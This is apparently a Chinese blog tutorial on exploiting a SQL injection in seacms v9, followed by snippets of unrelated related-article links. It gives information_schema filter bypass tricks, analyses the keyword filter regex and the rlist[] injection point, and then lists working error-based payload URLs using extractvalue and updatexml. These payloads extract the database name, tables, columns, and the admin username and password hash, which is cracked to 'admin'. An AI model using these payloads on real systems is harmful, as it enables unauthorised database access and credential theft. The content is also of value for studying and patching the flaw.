seacms v9 实现的MySQL注入
目录
过滤关键词information_schema 怎么办
一、环境搭建
二、环境分析
三、源代码分析
1、过滤程序
2、注入点
四、获取数据库名
五、获取数据库表名
六、获取表的列名
七、获取数据信息
过滤关键词information_schema 怎么办
1.、利用sys数据库(MySQL 5.7+) sys库是MySQL官方提供的系统监控数据库,可能未被过滤。
例:查询表名和列名
SELECT table_name FROM sys.schema_table_statistics; SELECT column_name FROM sys.schema_columns WHERE table_name='users';
2、 利用mysql系统库 mysql库存储用户权限信息,部分表可能包含元数据。
例:通过innodb_table_stats和innodb_index_stats获取表名
SELECT table_name FROM mysql.innodb_table_stats;
3.、编码混淆
十六进制编码:information_schema → 0x696E666F726D6174696F6E5F736368656D61
SELECT * FROM 0x696E666F726D6174696F6E5F736368656D61.tables;
Unicode编码:i → CHAR(105)
4、 字符串拼接 使用CONCAT()或SUBSTR()绕过简单过滤
SELECT * FROM CONCAT('inform', 'ation_schema').tables;
5、. 注释符干扰 插入注释分隔符:/**/或/*!*/
SELECT * FROM infor/*!mation_schema*/.tables;
一、环境搭建
二、环境分析
在海洋cms V9 中,用户输入(如登录、评论、分页、ID 等)未经过适当的验证和清理,直接嵌入到 SQL 查询中,导致了 SQL 注入攻击的发生。
三、源代码分析
1、过滤程序
整个模式由三部分组成:前面是一个否定字符组`[^0-9a-z@\._-]{1,}`,中间是关键字组`(union|sleep|...)`,后面又是同样的否定字符组。这个结构可能是在匹配那些被非允许字符包围的关键字,比如`union`前后有特殊符号的情况。
[^0-9a-z@\._-]{1,} # 第一部分:匹配非允许字符的连续序列
(union|sleep|benchmark|load_file|outfile) # 第二部分:匹配危险SQL关键词
[^0-9a-z@\.-]{1,} # 第三部分:再次匹配非允许字符的连续序列
2、注入点
参数rlist[]被用作数组传递,可能在后端代码中被直接拼接到SQL查询中,没有进行充分的过滤或参数化处理,导致注入发生。
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";四、获取数据库名
?gid=1&page=2&rlist[]=@`%27`,extractvalue(1,concat_ws(0x20,%200x5c,(select%20database()))),@`%27`gid=1:ID(数值型)。
page=2:分页参数。
extractvalue():MySQL XML处理函数,用于触发错误。
concat_ws():用分隔符连接字符串,0x20是空格,0x5c是反斜杠\。
select database():获取当前数据库用户。
攻击者访问构造的URL,服务器处理rlist[]参数。 后端代码将rlist[]值拼接到IN子句: 执行时因非法XPath语法报错,错误信息包含数据库用户
五、获取数据库表名
当sea_comment表中无数据时不会回显报错
添加数据后成功回显
?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),%20@`%27`
六、获取表的列名
?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%201,1))),%20@`%27`
?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%202,1))),%20@`%27`
七、获取数据信息
?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`
?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20password%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`
由于password进行的md5加密,将注入结果(f297a57a5a743894a0e4)进行解密后得到admin
相关文章:
seacms v9 实现的MySQL注入
目录 过滤关键词information_schema 怎么办 一、环境搭建 二、环境分析 三、源代码分析 1、过滤程序 2、注入点 四、获取数据库名 五、获取数据库表名 六、获取表的列名 七、获取数据信息 过滤关键词information_schema 怎么办 1.、利用sys数据库(MySQL 5.…...
Go中slice和map引用传递误区
背景 关于slice和map是指传递还是引用传递,很多文章都分析得模棱两可,其实在Go中只有值传递,但是很多情况下是因为分不清slice和map的底层实现,所以导致很多人在这一块产生疑惑,下面通过代码案例分析slice和map到底是…...
C# Unity 唐老狮 No.2 模拟面试题
本文章不作任何商业用途 仅作学习与交流 安利唐老狮与其他老师合作的网站,内有大量免费资源和优质付费资源,我入门就是看唐老师的课程 打好坚实的基础非常非常重要: Unity课程 - 游习堂 - 唐老狮创立的游戏开发在线学习平台 - Powered By EduSoho 如果你发现了文章内特殊的字体…...
【Uniapp-Vue3】开发userStore用户所需的相关操作
在项目根路径下创建的stores文件夹中创建user.js文件 并将以下内容复制到user.js中 import {ref} from "vue" import { defineStore } from pinia; const uniIdCo uniCloud.importObject("uni-id-co") const db uniCloud.database(); const usersTable…...
DeepSeek开源周首日:发布大模型加速核心技术可变长度高效FlashMLA 加持H800算力解码性能狂飙升至3000GB/s
FlashMLA的核心技术特性包括对BF16精度的全面支持,以及采用块大小为64的页式键值缓存(Paged KV Cache)系统,实现更精确的内存管理。在性能表现方面,基于CUDA12.6平台,FlashMLA在H800SXM5GPU上创下了显著成绩…...
易语言模拟真人鼠标轨迹算法 - 防止游戏检测
一.简介 鼠标轨迹算法是一种模拟人类鼠标操作的程序,它能够模拟出自然而真实的鼠标移动路径。 鼠标轨迹算法的底层实现采用C/C语言,原因在于C/C提供了高性能的执行能力和直接访问操作系统底层资源的能力。 鼠标轨迹算法具有以下优势: 模拟…...
DeepSeek 提示词:基础结构
🧑 博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/?__c1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,精通Java编…...
文件系统
目录 1.认识磁盘 磁盘的物理结构 CHS定位法 磁盘的逻辑结构 2.认识文件系统 inode 分区和分组 磁盘上的文件系统 3.软硬链接 软链接 软链接的操作 创建软链接 查看软链接 删除软链接 软链接的特点 软链接的使用场景 硬链接 硬链接的操作 创建硬链接 查看硬…...
力扣LeetCode:1472 设计浏览器历史记录
题目: 你有一个只支持单个标签页的 浏览器 ,最开始你浏览的网页是 homepage ,你可以访问其他的网站 url ,也可以在浏览历史中后退 steps 步或前进 steps 步。 请你实现 BrowserHistory 类: BrowserHistory(string h…...
【FL0091】基于SSM和微信小程序的社区二手物品交易小程序
🧑💻博主介绍🧑💻 全网粉丝10W,CSDN全栈领域优质创作者,博客之星、掘金/知乎/b站/华为云/阿里云等平台优质作者、专注于Java、小程序/APP、python、大数据等技术领域和毕业项目实战,以及程序定制化开发…...
【笔记ing】每天50个英语词汇
ex- e-out exclude 排外,排除 expect 期待,期望 单词构成: 前缀(prefix):情感(emotion)方向(orientation) 词根(root)…...
联想 SR590 服务器 530-8i RAID 控制器更换损坏的硬盘
坏了的硬盘会自动亮黄灯。用一个空的新盘来替换,新盘最好不要有东西。但是有东西可能也没啥,因为我看 RAID 控制器里有格式化的选项 1. 从 IPMI 把服务器关机,电源键进入绿色闪烁状态 2. 断电,推开塑料滑块拉出支架,…...
Java基础关键_012_包装类
目 录 一、基本数据类型对应的包装类 1.概览 2.说明 二、包装类 1.最大值与最小值 2.构造方法 3.常用方法(Integer为例) (1)compare(int x, int y) (2)max(int a, int b) 和 min(int a, int b) &…...
【react】TypeScript在react中的使用
目录 一、环境与项目配置 1. 创建 TypeScript React 项目 2. 关键tsconfig.json配置 3.安装核心类型包 二、组件类型定义 1. 函数组件(React 18) 2.类组件 三、Hooks 的深度类型集成 1. useState 2. useEffect 3. useRef 4. 自定义 Hook 四、事…...
vllm的使用方式,入门教程
vLLM是一个由伯克利大学LMSYS组织开源的大语言模型推理框架,旨在提升实时场景下的大语言模型服务的吞吐与内存使用效率。以下是详细的vLLM使用方式和入门教程: 1. 前期准备 在开始使用vLLM之前,建议先掌握一些基础知识,包括操作…...
IDEA 使用codeGPT+deepseek
一、环境准备 1、IDEA 版本要求 安装之前确保 IDEA 处于 2023.x 及以上的较新版本。 2、Python 环境 安装 Python 3.8 或更高版本 为了确保 DeepSeek 助手能够顺利运行,您需要在操作系统中预先配置 Python 环境。具体来说,您需要安装 Python 3.8 或更高…...
vue3中测试:单元测试、组件测试、端到端测试
1、单元测试:单元测试通常适用于独立的业务逻辑、组件、类、模块或函数,不涉及 UI 渲染、网络请求或其他环境问题。 describe(increment, () > {// 测试用例 }) toBe():用于严格相等比较(),适用于原始类…...
机器学习介绍与数据集
一、机器学习介绍与定义 1.1 机器学习定义 机器学习(Machine Learning)是让计算机从数据中自动学习规律,并依据这些规律对未来数据进行预测的技术。它涵盖聚类、分类、决策树、贝叶斯、神经网络、深度学习(Deep Learning…...
React 源码揭秘 | 更新队列
前面几篇遇到updateQueue的时候,我们把它先简单的当成了一个队列处理,这篇我们来详细讨论一下这个更新队列。 有关updateQueue中的部分,可以见源码 UpdateQueue实现 Update对象 我们先来看一下UpdateQueue中的内容,Update对象&…...
关于网络端口探测:TCP端口和UDP端口探测区别
网络端口探测是网络安全领域中的一项基础技术,它用于识别目标主机上开放的端口以及运行在这些端口上的服务。这项技术对于网络管理和安全评估至关重要。在网络端口探测中,最常用的两种协议是TCP(传输控制协议)和UDP(用…...
从零打造一个丝滑的 Vue 3 返回顶部组件
从零打造一个丝滑的 Vue 3 返回顶部组件 这个组件具备以下特性: 智能显示:滚动超过指定距离(默认 300px)后自动出现。丝滑动画:使用 Vue 内置的 <Transition> 实现淡入上滑的出现 / 消失效果。平滑滚动ÿ…...
AI Agent Harness Engineering 技术白皮书解读:核心概念与技术架构全景图
AI Agent Harness Engineering 技术白皮书解读:核心概念与技术架构全景图 关键词 AI Agent(智能体) Harness Engineering(工程框架) 多智能体系统 认知架构 工具调用链 记忆管理 决策引擎 摘要 随着人工智能技术的快速发展,AI Agent(智能体)正在成为下一代AI应用的核…...
LSM303DLHC六轴传感器驱动与电子罗盘实现指南
1. LSM303DLHC 多模态传感器芯片深度解析:加速度计、磁力计与温度传感的嵌入式集成实践LSM303DLHC 是意法半导体(STMicroelectronics)推出的一款高集成度、低功耗的六轴环境感知传感器模块,内部集成了独立校准的三轴加速度计&…...
车机固件升级全攻略:工具选择与操作技巧
1. 车机固件升级入门指南 刚买车那会儿,我对车机系统升级完全没概念,直到有次导航把我导到一条正在施工的断头路上,才发现自己的车机地图已经两年没更新了。车机固件升级就像给手机系统更新一样重要,不仅能修复bug,还能…...
如何永久保存微信聊天记录:WeChatMsg完整指南让你的数字记忆永不丢失
如何永久保存微信聊天记录:WeChatMsg完整指南让你的数字记忆永不丢失 【免费下载链接】WeChatMsg 提取微信聊天记录,将其导出成HTML、Word、CSV文档永久保存,对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Tre…...
洞穴民宿的装修材料有哪些?
洞穴民宿的装修材料有哪些?在旅游市场不断发展的当下,洞穴民宿以其独特的风格和体验吸引着众多游客。那么,打造洞穴民宿需要用到哪些装修材料呢?天然石材天然石材是洞穴民宿装修的常用材料。如石灰岩、砂岩等,这些石材…...
Umi-OCR终极指南:三步实现免费离线OCR,高效处理海量文档
Umi-OCR终极指南:三步实现免费离线OCR,高效处理海量文档 【免费下载链接】Umi-OCR OCR software, free and offline. 开源、免费的离线OCR软件。支持截屏/批量导入图片,PDF文档识别,排除水印/页眉页脚,扫描/生成二维码…...
从Bulk CMOS到先进工艺:Sentaurus TCAD中几何结构与掺杂如何‘捏’出你的Ion和Ioff
从Bulk CMOS到先进工艺:Sentaurus TCAD中几何结构与掺杂如何‘捏’出你的Ion和Ioff 在半导体器件设计中,Ion(导通电流)和Ioff(关断电流)是衡量器件性能的两个关键指标。就像雕塑家通过调整黏土的形状和质地…...
如何打造专属AI开发工作流:Forge高级配置的终极指南
如何打造专属AI开发工作流:Forge高级配置的终极指南 【免费下载链接】forgecode AI enabled pair programmer for Claude, GPT, O Series, Grok, Deepseek, Gemini and 300 models 项目地址: https://gitcode.com/gh_mirrors/forge39/forgecode Forge作为一款…...
Android开发必看:fitsSystemWindows的5个实际应用场景与避坑指南
Android开发必看:fitsSystemWindows的5个实际应用场景与避坑指南 在Android开发中,fitsSystemWindows这个看似简单的属性,却常常让开发者陷入各种布局适配的困境。特别是在全面屏、刘海屏设备普及的今天,正确处理系统窗口的适配问…...